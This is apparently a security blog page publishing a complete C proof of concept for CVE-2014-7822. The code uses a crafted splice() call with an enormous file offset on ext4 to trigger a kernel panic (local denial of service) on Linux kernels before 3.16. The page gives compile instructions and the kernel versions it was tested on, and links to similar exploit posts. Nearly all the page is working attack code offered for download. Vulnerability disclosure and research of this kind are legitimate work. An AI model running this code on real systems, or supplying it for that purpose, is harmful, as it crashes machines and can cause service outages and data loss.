You are here : Home » Exploits » cve-2014-7822 Linux Kernel D.O.S POC

cve-2014-7822 Linux Kernel D.O.S POC

D 11 April 2015     H 15:14     A Emeric Nasi     C 0 messages


agrandir
  1. /* ----------------------------------------------------------------------------------------------------
  2.  * cve-2014-7822_poc.c
  3.  *
  4.  * The implementation of certain splice_write file operations in the Linux kernel before 3.16 does not enforce a restriction on the maximum size of a single file
  5.  * which allows local users to cause a denial of service (system crash) or possibly have unspecified other impact via a crafted splice system call,
  6.  * as demonstrated by use of a file descriptor associated with an ext4 filesystem.
  7.  *
  8.  *
  9.  * This is a POC to reproduce vulnerability. No exploitation here, just simple kernel panic.
  10.  * Works on ext4 filesystem
  11.  * Tested on Ubuntu with 3.13 and 3.14 kernels
  12.  *
  13.  * Compile with gcc -fno-stack-protector -Wall -o cve-2014-7822_poc cve-2014-7822_poc.c
  14.  *
  15.  *
  16.  * Emeric Nasi - www.sevagas.com
  17.  *-----------------------------------------------------------------------------------------------------*/
  18.  
  19.  
  20. /* ----------------------- Includes ----------------------------*/
  21.  
  22. #define _GNU_SOURCE
  23. #include <fcntl.h>
  24. #include <stdio.h>
  25. #include <unistd.h>
  26. #include <errno.h>
  27. #include <string.h>
  28. #include <stdlib.h>
  29. #include <limits.h>
  30.  
  31. #define EXPLOIT_NAME "cve-2014-7822"
  32. #define EXPLOIT_TYPE DOS
  33.  
  34. #define JUNK_SIZE 30000
  35.  
  36. /* ----------------------- functions ----------------------------*/
  37.  
  38.  
  39. /* Useful:
  40.  *
  41. +============+===============================+===============================+
  42. | \ File flag| | |
  43. | \ | !EXT4_EXTENTS_FL | EXT4_EXTETNS_FL |
  44. |Fs Features\| | |
  45. +------------+-------------------------------+-------------------------------+
  46. | !extent | write: 2194719883264 | write: -------------- |
  47. | | seek: 2199023251456 | seek: -------------- |
  48. +------------+-------------------------------+-------------------------------+
  49. | extent | write: 4402345721856 | write: 17592186044415 |
  50. | | seek: 17592186044415 | seek: 17592186044415 |
  51. +------------+-------------------------------+-------------------------------+
  52. */
  53.  
  54.  
  55. /**
  56.  * Poc for cve_2014_7822 vulnerability
  57.  */
  58. int main()
  59. {
  60. int pipefd[2];
  61. int result;
  62. int in_file;
  63. int out_file;
  64. int zulHandler;
  65. loff_t viciousOffset = 0;
  66.  
  67. char junk[JUNK_SIZE] ={0};
  68.  
  69. result = pipe(pipefd);
  70.  
  71. // Create and clear zug.txt and zul.txt files
  72. system("cat /dev/null > zul.txt");
  73. system("cat /dev/null > zug.txt");
  74.  
  75. // Fill zul.txt with A
  76. zulHandler = open("zul.txt", O_RDWR);
  77. memset(junk,'A',JUNK_SIZE);
  78. write(zulHandler, junk, JUNK_SIZE);
  79. close(zulHandler);
  80.  
  81. //put content of zul.txt in pipe
  82. viciousOffset = 0;
  83. in_file = open("zul.txt", O_RDONLY);
  84. result = splice(in_file, 0, pipefd[1], NULL, JUNK_SIZE, SPLICE_F_MORE | SPLICE_F_MOVE);
  85. close(in_file);
  86.  
  87.  
  88. // Put content of pipe in zug.txt
  89. out_file = open("zug.txt", O_RDWR);
  90. viciousOffset = 118402345721856; // Create 108 tera byte file... can go up as much as false 250 peta byte ext4 file size!!
  91. printf("[cve_2014_7822]: ViciousOffset = %lu\n", (unsigned long)viciousOffset);
  92.  
  93. result = splice(pipefd[0], NULL, out_file, &viciousOffset, JUNK_SIZE , SPLICE_F_MORE | SPLICE_F_MOVE); //8446744073709551615
  94. if (result == -1)
  95. {
  96. printf("[cve_2014_7822 error]: %d - %s\n", errno, strerror(errno));
  97. exit(1);
  98. }
  99. close(out_file);
  100.  
  101. close(pipefd[0]);
  102. close(pipefd[1]);
  103.  
  104.  
  105. //Open zug.txt
  106. in_file = open("zug.txt", O_RDONLY);
  107. close(in_file);
  108.  
  109. printf("[cve_2014_7822]: POC triggered, ... system will panic after some time\n");
  110.  
  111. return 0;
  112. }

Download

Also in this section

15 December 2016 – TVT DVR/CCTV webshell exploit

24 February 2015 – cve-2014-4943 Linux Kernel D.O.S POC

23 February 2015 – cve-2014-9322 Linux Kernel D.O.S POC

23 February 2015 – cve-2014-3631 Linux Kernel D.O.S POC

Any message or comments?
pre-moderation

This forum is moderated before publication: your contribution will only appear after being validated by an administrator.

Who are you?
Your post